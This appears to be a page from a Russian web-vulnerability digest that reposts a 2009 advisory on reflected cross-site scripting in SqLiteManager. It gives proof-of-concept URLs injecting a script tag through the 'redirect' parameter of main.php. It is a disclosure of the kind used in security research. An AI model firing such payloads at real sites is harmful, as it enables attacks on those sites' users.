Дополнительная информация

Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

[NGENUITY] - Spiceworks Multiple Vulnerabilities (XSS & CSRF)

[NGENUITY] - Ticket Subject Persistent XSS in Kayako SupportSuite

[RT-SA-2009-005] Papoo CMS: Authenticated Arbitrary Code Execution

Vulnerability in Dumb math captcha for WordPress

From:	hadikiamarsi_(at)_hotmail.com <hadikiamarsi_(at)_hotmail.com>
Date:	10 августа 2009 г.
Subject:	XSS in SqLiteManager

###########################################
#
# SqLiteManager ( All Version ) Cross Site Scripting
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi@gmail.com
#
# Download :
http://downloads.sourceforge.net/project/sqlitemanager/sqlitemanager/1.2.0/SQLite
Manager-1.2.0.zip?use_mirror=heanet
#
###########################################

PoC :

http://[www.example.com]/main.php?redirect=<script>alert('Hadi Kiamarsi')</script>

http://[www.example.com]/[PATH]/main.
php?redirect=<script>alert('Hadi Kiamarsi')</script>


local Example :


http://localhost/main.php?redirect=<script>alert('Hadi Kiamarsi')</script>